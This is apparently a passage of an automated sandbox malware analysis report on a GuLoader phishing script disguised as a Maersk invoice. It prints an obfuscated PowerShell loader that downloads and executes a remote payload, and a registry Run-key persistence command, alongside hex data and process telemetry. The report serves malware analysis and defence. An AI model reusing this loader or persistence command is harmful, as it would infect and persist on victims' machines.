2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 50 67 63 41 41 41 41 44 65 77 77 39 75 32 65 74 5a 39 58 6c 6b 63 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4b 62 6d 39 6e 6f 36 31 6f 4d 32 31 6c 49 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 Data Ascii: XFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcPgcAAAADeww9u2etZ9Xlkc/Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vKbm9no61oM21lIRERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 50 67 61 34 41 41 41 44 5a 79 66 4d 50 66 76 2f 72 55 4a 43 58 4d 31 39 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 6d 35 76 62 34 39 6e 34 36 30 35 67 52 66 30 78 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 37 75 34 50 72 76 Data Ascii: kJCQkJCQkJCQPga4AAADZyfMPfv/rUJCXM199fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19m5vb49n4605gRf0x7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u4Prv
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 32 59 50 37 2f 45 50 39 65 48 72 52 33 45 4c 44 6d 58 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 4f 52 77 4b 32 66 51 50 32 4f 72 72 56 52 4c 48 6d 32 5a 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 Data Ascii: //////////////////////////////////////////////////////////////////////////////////////////////////////////2YP7/EP9eHrR3ELDmXBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBORwK2fQP2OrrVRLHm2ZxcXFxcXFxcXFxcXFxcXFxcX
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 33 74 37 65 33 74 37 65 33 74 37 65 42 4e 41 65 72 46 61 34 6c 32 66 62 5a 37 4f 74 4d 45 76 5a 51 56 4c 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 72 4b 79 73 67 2b 42 6f 77 41 41 41 41 39 69 31 41 2b 75 38 4f 73 39 51 75 68 56 43 34 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 59 47 42 67 5a 76 5a 2f 74 6e 32 36 31 65 79 37 39 5a 6e 67 6f 4b 43 67 6f 4b 43 67 6f Data Ascii: 3t7e3t7e3t7eBNAerFa4l2fbZ7OtMEvZQVLKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysg+BowAAAA9i1A+u8Os9QuhVC4GBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgZvZ/tn261ey79ZngoKCgoKCgo
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 52 61 57 68 6b 49 36 52 73 53 53 51 51 33 70 52 5a 71 65 4e 58 48 36 52 45 4d 61 72 41 47 45 51 79 72 45 6f 55 6c 37 69 53 31 39 41 6a 2f 6a 72 71 53 58 4e 66 57 5a 64 4a 59 74 64 49 56 2b 47 67 6c 72 36 52 51 48 78 63 30 72 50 49 51 30 2f 78 54 63 72 58 39 68 6f 69 67 4e 51 6e 71 78 55 55 2b 2f 50 4b 4d 33 51 53 56 71 47 41 7a 35 52 48 4d 45 38 42 76 4b 52 61 6e 4a 6c 4b 4e 35 52 66 67 72 62 71 59 48 63 33 6e 45 77 73 6f 59 69 58 37 74 63 45 4c 41 35 50 51 37 74 4f 42 50 6c 32 57 34 66 77 44 2b 6e 4b 57 35 52 74 4c 6f 67 54 75 34 77 31 79 42 78 79 54 79 37 66 65 30 77 76 31 37 39 6d 77 6a 49 71 31 38 45 2f 6f 52 67 76 35 33 4b 73 37 45 33 35 72 78 76 30 46 69 63 76 31 77 53 76 55 46 49 71 35 35 79 71 36 46 41 6e 46 36 35 36 4e 34 62 75 59 31 48 73 2f 46 Data Ascii: RaWhkI6RsSSQQ3pRZqeNXH6REMarAGEQyrEoUl7iS19Aj/jrqSXNfWZdJYtdIV+Gglr6RQHxc0rPIQ0/xTcrX9hoigNQnqxUU+/PKM3QSVqGAz5RHME8BvKRanJlKN5RfgrbqYHc3nEwsoYiX7tcELA5PQ7tOBPl2W4fwD+nKW5RtLogTu4w1yBxyTy7fe0wv179mwjIq18E/oRgv53Ks7E35rxv0Ficv1wSvUFIq55yq6FAnF656N4buY1Hs/F
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 4b 70 45 48 67 30 4d 64 45 6c 47 77 44 58 76 31 69 72 4c 45 57 45 68 79 49 64 65 47 79 63 56 54 67 61 50 48 37 53 66 2b 35 68 70 67 5a 30 4c 69 75 33 66 76 67 32 74 2f 6c 46 75 2b 6c 61 39 57 74 6d 49 36 5a 37 50 68 2f 54 2f 33 70 67 48 6c 68 66 48 49 69 46 43 58 4c 4c 4e 2b 45 61 6f 49 63 56 46 4f 2b 39 67 6b 67 69 44 38 6b 71 78 55 6e 71 41 34 55 72 69 55 53 75 39 41 78 76 70 52 66 79 68 72 4b 46 4f 6d 62 6b 4c 69 43 45 76 36 50 38 6b 71 51 2b 71 4e 38 4c 52 6f 49 6d 44 76 35 38 70 30 58 39 55 73 79 68 4a 73 33 4f 4c 52 42 52 44 5a 6e 68 2b 72 71 4b 36 39 35 4a 75 4d 51 67 50 64 47 73 36 52 71 42 41 62 59 72 30 4d 51 52 7a 6e 69 35 71 52 64 65 67 75 53 67 70 52 59 41 59 41 53 4c 36 52 64 69 52 44 6f 2b 4a 52 59 6b 41 69 66 48 58 49 33 6e 45 6b 6b 6e 49 Data Ascii: KpEHg0MdElGwDXv1irLEWEhyIdeGycVTgaPH7Sf+5hpgZ0Liu3fvg2t/lFu+la9WtmI6Z7Ph/T/3pgHlhfHIiFCXLLN+EaoIcVFO+9gkgiD8kqxUnqA4UriUSu9AxvpRfyhrKFOmbkLiCEv6P8kqQ+qN8LRoImDv58p0X9UsyhJs3OLRBRDZnh+rqK695JuMQgPdGs6RqBAbYr0MQRzni5qRdeguSgpRYAYASL6RdiRDo+JRYkAifHXI3nEkknI
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 46 34 2f 70 2b 61 47 63 34 45 50 59 69 78 75 49 35 4e 31 6b 63 30 53 76 30 6c 4e 4e 56 64 42 61 75 4a 61 53 59 62 44 4b 76 46 66 61 73 51 4a 52 74 33 61 73 56 72 71 77 2b 36 61 38 6c 71 35 78 30 64 79 43 41 55 69 53 72 46 66 36 64 64 37 68 57 59 6f 5a 75 79 54 4b 31 49 44 54 7a 53 6a 77 6e 50 59 58 68 2b 51 4b 6d 7a 35 56 52 67 6d 63 45 75 32 45 30 37 2b 57 6a 49 77 7a 2b 38 33 31 74 45 4c 61 6e 4c 77 6d 50 6f 70 78 75 54 45 51 58 58 46 5a 49 63 36 52 61 55 59 6a 6e 53 70 52 66 47 48 47 4b 6b 6e 55 33 6e 45 34 73 6f 34 69 58 2b 39 73 65 41 79 73 54 53 42 67 68 52 47 6f 2f 59 48 70 72 61 68 2b 51 49 6e 39 57 4b 48 6f 36 41 49 32 4c 58 58 53 6a 70 36 4f 5a 46 4a 46 33 66 63 32 51 64 48 77 71 49 59 71 62 45 4b 6b 43 70 49 63 78 48 42 33 46 63 2f 36 64 39 78 Data Ascii: F4/p+aGc4EPYixuI5N1kc0Sv0lNNVdBauJaSYbDKvFfasQJRt3asVrqw+6a8lq5x0dyCAUiSrFf6dd7hWYoZuyTK1IDTzSjwnPYXh+QKmz5VRgmcEu2E07+WjIwz+831tELanLwmPopxuTEQXXFZIc6RaUYjnSpRfGHGKknU3nE4so4iX+9seAysTSBghRGo/YHprah+QIn9WKHo6AI2LXXSjp6OZFJF3fc2QdHwqIYqbEKkCpIcxHB3Fc/6d9x

Target ID:	0
Start time:	01:46:56
Start date:	02/07/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"
Imagebase:	0x7ff67f610000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:47:00
Start date:	02/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:47:00
Start date:	02/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:47:02
Start date:	02/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Imagebase:	0x7ff77c310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:47:10
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
Imagebase:	0xfe0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2307801127.000000000A152000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:47:12
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:47:52
Start date:	02/07/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x510000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2959075340.0000000005192000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	01:47:54
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:47:54
Start date:	02/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:47:54
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Imagebase:	0x550000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FFD9B88B506 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556653338b8ccbec3d550492add127a379c5de8218d2f09f22266f4fb7368871
Instruction ID: 920e706070d0436ed848c8eaec880dda58dba5740987d6a4e981bd542155fa8a
Opcode Fuzzy Hash: 556653338b8ccbec3d550492add127a379c5de8218d2f09f22266f4fb7368871
Instruction Fuzzy Hash: 2EF1A730A09E4E8FEBA8DF28C8557E937D1FF98310F04426EE85DC7295DB35A9458B81

Function 00007FFD9B88C2B2 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54077963d8bccaf24ccf27d97179a960a7ed3b046df0c73e4432412e1e5a26e1
Instruction ID: 1470b7a5bde2971067094f67f9af58fb84c0054dc59fa62d3c376886edb53717
Opcode Fuzzy Hash: 54077963d8bccaf24ccf27d97179a960a7ed3b046df0c73e4432412e1e5a26e1
Instruction Fuzzy Hash: 12E1C430A09A4E8FEBA8DF28C8657F977D1FF58310F04426AD85DC72A5CB34A9418B81

Function 00007FFD9B885C6C Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

